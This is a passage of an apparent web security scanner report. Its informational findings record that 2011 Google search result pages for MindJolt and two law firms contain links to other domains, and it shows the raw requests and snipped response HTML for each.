</div><a id=gb_36 href="http://www.youtube.com/results?q=MindJolt&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')">Play Fun Free Online Arcade Games - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wXBXoUe2yesJ:www.mindjolt.com/+MindJolt&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/game-list" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoADAA')">Game List A-Z</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/games/bubble-spinner" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoATAA')">Bubble Spinner</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/top-games" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoAjAA')">Most Popular</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/games/bricks-breaking" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAzAA')">Bricks Breaking</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/sports-games" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBDAA')">Sports</a></div><div class=sld><a class=sla href="http://www.mindjolt.com/games/christmas-crunch" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBTAA')">Christmas Crunch</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/top-games/scored" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBjAA')">Scored Games</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/game-categories" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBzAA')">Categories</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/game-list" class=l onmousedown="return clk(this.href,'','','','2','','0CC8QFjAB')">Games at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:16WknjbCX0AJ:www.mindjolt.com/game-list+MindJolt&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/games/bouncing-balls" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')">Bouncing Balls - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Du2mkuWCIzgJ:www.mindjolt.com/games/bouncing-balls+MindJolt&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/top-games" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Most Popular - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EjM3Z5k_vzUJ:www.mindjolt.com/top-games+MindJolt&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://apps.facebook.com/mindjolt/" class=l onmousedown="return clk(this.href,'','','','5','','0CEUQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Kvih9pBuLToJ:apps.facebook.com/mindjolt/+MindJolt&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/mindjolt" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4T5MwPAGtcEJ:www.facebook.com/mindjolt+MindJolt&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techcrunch.com/2011/04/18/chris-dewolfes-mindjolt-expands-gaming-empire-buys-sgn-and-hallpass-media/" class=l onmousedown="return clk(this.href,'','','','7','','0CFQQFjAG')">Chris DeWolfe&#39;s <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FFvN3zbabRwJ:techcrunch.com/2011/04/18/chris-dewolfes-mindjolt-expands-gaming-empire-buys-sgn-and-hallpass-media/+MindJolt&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/mindjolt" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:42f5NNrmuGIJ:www.crunchbase.com/company/mindjolt+MindJolt&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.appdata.com/devs/28285-mindjolt" class=l onmousedown="return clk(this.href,'','','','9','','0CGMQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mxXB5O5ErMgJ:www.appdata.com/devs/28285-mindjolt+MindJolt&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGgQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/mindjolt" class=l onmousedown="return clk(this.href,'','','','10','','0CGkQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CXOybmesPnEJ:twitter.com/mindjolt+MindJolt&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CG4QIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.addictinggames.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHEQoggwCg')">Games</a>
...[SNIP]...
<div><a href="http://www.agame.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHMQoggwCw')">Agame.com</a>
...[SNIP]...
<div><a href="http://www.miniclip.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHUQoggwDA')">Miniclip.com</a>
...[SNIP]...
<div><a href="http://www.freeonlinegames.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHcQoggwDQ')">FreeOnlineGames.com</a>
...[SNIP]...

19.43. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78455

<!doctype html> <head> <title>Tucker Ellis &amp; West - Google Search</title> <script>window.google={kEI:"tNDLTblO4fbSAfGrqcsG",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,2968
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Tucker+Ellis+%26+West&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tuckerellis.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Xv0xaqxKEPMJ:www.tuckerellis.com/+Tucker+Ellis+%26+West&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Xv0xaqxKEPMJ:www.tuckerellis.com/+Tucker+Ellis+%26+West&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.tuckerellis.com/info/employee-access" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoADAA')">Employee Access</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.tuckerellis.com/careers/careers-at-tew" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoATAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.tuckerellis.com/about_us/overview" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAjAA')">About Us</a></div><div class=sld><a class=sla href="http://www.tuckerellis.com/info/resources" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAzAA')">Resources</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tuckerellis.com/files/tucker_ellis__west_congratulates_cox.pdf" class=l onmousedown="return clk(this.href,'','','','3','','0CC8QFjAC')"><em>
...[SNIP]...
<h3 class="r"><a href="http://webmail.tuckerellis.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDYQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:T70q8OBdvGgJ:webmail.tuckerellis.com/+Tucker+Ellis+%26+West&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:T70q8OBdvGgJ:webmail.tuckerellis.com/+Tucker+Ellis+%26+West&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDsQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawmarketing.com/pages/articles.asp?Action=Article&amp;ArticleCategoryID=58&amp;ArticleID=911" class=l onmousedown="return clk(this.href,'','','','5','','0CD4QFjAE')">Alternative Fees Put <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TU2ZImEHOe4J:www.lawmarketing.com/pages/articles.asp%3FAction%3DArticle%26ArticleCategoryID%3D58%26ArticleID%3D911+Tucker+Ellis+%26+West&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:TU2ZImEHOe4J:www.lawmarketing.com/pages/articles.asp%3FAction%3DArticle%26ArticleCategoryID%3D58%26ArticleID%3D911+Tucker+Ellis+%26+West&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/tucker-ellis-&amp;-west-llp" class=l onmousedown="return clk(this.href,'','','','6','','0CEUQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JQlszfwigsEJ:www.linkedin.com/company/tucker-ellis-%26-west-llp+Tucker+Ellis+%26+West&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:JQlszfwigsEJ:www.linkedin.com/company/tucker-ellis-%26-west-llp+Tucker+Ellis+%26+West&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zY56DaZYv-oJ:www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html+Tucker+Ellis+%26+West&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zY56DaZYv-oJ:www.superlawyers.com/ohio/lawfirm/Tucker-Ellis-and-West-LLP/a4ab5d8a-4a9c-48b6-bf39-887ab009c5ea.html+Tucker+Ellis+%26+West&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.law.com/jsp/article.jsp?id=1202432186287" class=l onmousedown="return clk(this.href,'','','','8','','0CFMQFjAH')">Law.com - Billing Options Have Paid Off for <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BUPdSeMGCEoJ:www.law.com/jsp/article.jsp%3Fid%3D1202432186287+Tucker+Ellis+%26+West&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BUPdSeMGCEoJ:www.law.com/jsp/article.jsp%3Fid%3D1202432186287+Tucker+Ellis+%26+West&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFgQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Tucker-Ellis-%26-West-LLP" class=l onmousedown="return clk('http://www.indeed.com/cmp/Tucker-Ellis-%26-West-LLP','','','','9','','0CFoQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M7qILs_NU7MJ:www.indeed.com/cmp/Tucker-Ellis-%2526-West-LLP+Tucker+Ellis+%26+West&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:M7qILs_NU7MJ:www.indeed.com/cmp/Tucker-Ellis-%2526-West-LLP+Tucker+Ellis+%26+West&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CF8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/" class=l onmousedown="return clk(this.href,'','','','10','','0CGAQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:33yydL6SYfoJ:www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/+Tucker+Ellis+%26+West&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:33yydL6SYfoJ:www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/+Tucker+Ellis+%26+West&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGUQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=20725617" class=l onmousedown="return clk(this.href,'','','','11','','0CGYQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jRGYrKmTBuAJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D20725617+Tucker+Ellis+%26+West&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jRGYrKmTBuAJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D20725617+Tucker+Ellis+%26+West&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CGsQIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.ulmer.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CG8QoggwCw')">Ulmer & Berne LLP</a>
...[SNIP]...
<div><a href="http://www.ralaw.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHEQoggwDA')">Roetzel & Andress</a>
...[SNIP]...
<div><a href="http://www.bevanlaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHMQoggwDQ')">Bevanlaw.com</a>
...[SNIP]...
<div><a href="http://www.jonesday.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHUQoggwDg')">Jones Day</a>
...[SNIP]...

19.44. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Stroock+%26+Stroock+%26+Lavan&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 77384

<!doctype html> <head> <title>Stroock &amp; Stroock &amp; Lavan - Google Search</title> <script>window.google={kEI:"utDLTffEEILq0gHl8Oj8Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Stroock+%26+Stroock+%26+Lavan&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB8QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:igGunZkaFPIJ:www.stroock.com/+Stroock+%26+Stroock+%26+Lavan&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:igGunZkaFPIJ:www.stroock.com/+Stroock+%26+Stroock+%26+Lavan&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=5" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=44" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoATAA')">Offices/Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=7" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAjAA')">Careers</a></div><div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=2" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoAzAA')">About us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=57" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBDAA')">Publications</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=63&amp;itemID=8" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBTAA')">Real Estate</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=29" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBjAA')">Recruiting</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.stroock.com/sitecontent.cfm?contentID=52" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBzAA')">News</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/sitecontent.cfm?contentID=44" class=l onmousedown="return clk(this.href,'','','','2','','0CDAQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ju4odaUKgvwJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D44+Stroock+%26+Stroock+%26+Lavan&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ju4odaUKgvwJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D44+Stroock+%26+Stroock+%26+Lavan&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/sitecontent.cfm?contentID=7" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-mdoIZvhjhkJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D7+Stroock+%26+Stroock+%26+Lavan&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:-mdoIZvhjhkJ:www.stroock.com/sitecontent.cfm%3FcontentID%3D7+Stroock+%26+Stroock+%26+Lavan&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CD4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.stroock.com/sitecontent.cfm?contentID=35" class=l onmousedown="return clk(this.href,'','','','4','','0CEAQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MlaxS9_1AU8J:www.stroock.com/sitecontent.cfm%3FcontentID%3D35+Stroock+%26+Stroock+%26+Lavan&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:MlaxS9_1AU8J:www.stroock.com/sitecontent.cfm%3FcontentID%3D35+Stroock+%26+Stroock+%26+Lavan&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Stroock_%26_Stroock_%26_Lavan" class=l onmousedown="return clk('http://en.wikipedia.org/wiki/Stroock_%26_Stroock_%26_Lavan','','','','5','','0CEoQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:evKtmatPMdUJ:en.wikipedia.org/wiki/Stroock_%2526_Stroock_%2526_Lavan+Stroock+%26+Stroock+%26+Lavan&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:evKtmatPMdUJ:en.wikipedia.org/wiki/Stroock_%2526_Stroock_%2526_Lavan+Stroock+%26+Stroock+%26+Lavan&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CE8QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/stroock-stroock-lavan/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XaGSFd4KrL4J:abovethelaw.com/stroock-stroock-lavan/+Stroock+%26+Stroock+%26+Lavan&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:XaGSFd4KrL4J:abovethelaw.com/stroock-stroock-lavan/+Stroock+%26+Stroock+%26+Lavan&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Stroock-&amp;-Stroock-&amp;-Lavan-LLP?companyId=7622" class=l onmousedown="return clk(this.href,'','','','7','','0CFgQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uOd9Ua9adRUJ:www.vault.com/wps/portal/usa/companies/company-profile/Stroock-%26-Stroock-%26-Lavan-LLP%3FcompanyId%3D7622+Stroock+%26+Stroock+%26+Lavan&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uOd9Ua9adRUJ:www.vault.com/wps/portal/usa/companies/company-profile/Stroock-%26-Stroock-%26-Lavan-LLP%3FcompanyId%3D7622+Stroock+%26+Stroock+%26+Lavan&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CF0QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CF8QFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SpEjBGOvYAAJ:www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm+Stroock+%26+Stroock+%26+Lavan&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:SpEjBGOvYAAJ:www.martindale.com/Stroock-Stroock-Lavan-LLP/506583-law-firm-office.htm+Stroock+%26+Stroock+%26+Lavan&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CGQQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=NY3200" class=l onmousedown="return clk(this.href,'','','','9','','0CGYQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TnozukwqCF8J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DNY3200+Stroock+%26+Stroock+%26+Lavan&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:TnozukwqCF8J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DNY3200+Stroock+%26+Stroock+%26+Lavan&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.prnewswire.com/news-releases/new-york-state-comptroller-dinapoli-at-stroock--stroock--lavan-llp-121666293.html" class=l onmousedown="return clk(this.href,'','','','10','','0CG0QFjAJ')">New York State Comptroller DiNapoli at <em>
...[SNIP]...
<div><a href="http://www.srz.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHQQoggwCg')">Schulte Roth & Zabel LLP</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHYQoggwCw')">Proskauer</a>
...[SNIP]...
